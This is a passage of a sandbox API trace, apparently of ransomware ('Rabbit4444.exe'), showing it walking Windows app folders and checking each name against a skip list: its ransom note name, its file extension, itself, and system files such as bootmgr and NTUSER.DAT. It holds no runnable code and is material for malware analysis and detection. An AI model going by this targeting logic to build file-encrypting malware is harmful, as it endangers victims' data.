ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x34036ffb, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.6_8")) returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.859] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe" [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d400 [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x121e98 [0055.859] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d408 | out: ListHead=0xf68b0, ListEntry=0x11d408) returned 0x11d3c8 [0055.859] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2252fd4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x34273354, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x34273354, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.0_8")) returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.859] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.859] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe" [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11ce80 [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x119df0 [0055.859] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11ce88 | out: ListHead=0xf68b0, ListEntry=0x11ce88) returned 0x11d408 [0055.860] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd08196, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x344af7fa, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x344af7fa, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.1_8")) returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.860] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe" [0055.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11ce60 [0055.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x119ea8 [0055.860] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11ce68 | out: ListHead=0xf68b0, ListEntry=0x11ce68) returned 0x11ce88 [0055.860] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb85500d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xeb8a14cb, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeb8a14cb, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.3_8")) returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.860] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Runtime.1.3_8wekyb3d8bbwe" [0055.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cf20 [0055.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x119f60 [0055.860] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cf28 | out: ListHead=0xf68b0, ListEntry=0x11cf28) returned 0x11ce68 [0055.860] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94b424e4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x94bb4bf1, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x94bb4bf1, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.4_8")) returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.860] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.861] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Runtime.1.4_8wekyb3d8bbwe" [0055.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d0a0 [0055.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x11a018 [0055.861] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d0a8 | out: ListHead=0xf68b0, ListEntry=0x11d0a8) returned 0x11cf28 [0055.861] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28b9688c, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x3509b345, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3509b345, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.6_8")) returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.861] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe" [0055.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cf80 [0055.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x11a0d0 [0055.861] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cf88 | out: ListHead=0xf68b0, ListEntry=0x11cf88) returned 0x11d0a8 [0055.861] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28e030d8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x8d747894, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8d974b3f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.OneNote_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ONE")) returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.861] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.862] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.862] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.862] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.862] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.862] lstrcmpiW (lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.862] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Office.OneNote_8wekyb3d8bbwe" | out: lpString1="Microsoft.Office.OneNote_8wekyb3d8bbwe") returned="Microsoft.Office.OneNote_8wekyb3d8bbwe" [0055.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cf60 [0055.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9c) returned 0x11a188 [0055.862] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cf68 | out: ListHead=0xf68b0, ListEntry=0x11cf68) returned 0x11cf88 [0055.862] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f04703, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd6e72acf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd6e72acf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Sway_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.SWA")) returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.863] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Office.Sway_8wekyb3d8bbwe" | out: lpString1="Microsoft.Office.Sway_8wekyb3d8bbwe") returned="Microsoft.Office.Sway_8wekyb3d8bbwe" [0055.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cee0 [0055.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x113e18 [0055.863] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cee8 | out: ListHead=0xf68b0, ListEntry=0x11cee8) returned 0x11cf68 [0055.863] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5cb721c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd5dc228d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd5dc228d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.OneConnect_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.ONE")) returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.863] lstrcmpiW (lpString1="Microsoft.OneConnect_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.863] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.OneConnect_8wekyb3d8bbwe" | out: lpString1="Microsoft.OneConnect_8wekyb3d8bbwe") returned="Microsoft.OneConnect_8wekyb3d8bbwe" [0055.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d080 [0055.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x1134b8 [0055.864] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d088 | out: ListHead=0xf68b0, ListEntry=0x11d088) returned 0x11cee8 [0055.864] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x236d6f79, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4774ad5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd4774ad5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.People_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PEO")) returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.People_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.864] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.People_8wekyb3d8bbwe" | out: lpString1="Microsoft.People_8wekyb3d8bbwe") returned="Microsoft.People_8wekyb3d8bbwe" [0055.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11ce00 [0055.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8c) returned 0x11ea68 [0055.864] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11ce08 | out: ListHead=0xf68b0, ListEntry=0x11ce08) returned 0x11d088 [0055.864] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f649af8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7f7086bb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7f7086bb, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.PPIProjection_cw5n1h2txyewy", cAlternateFileName="MICROS~1.PPI")) returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2=".") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="..") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.864] lstrcmpiW 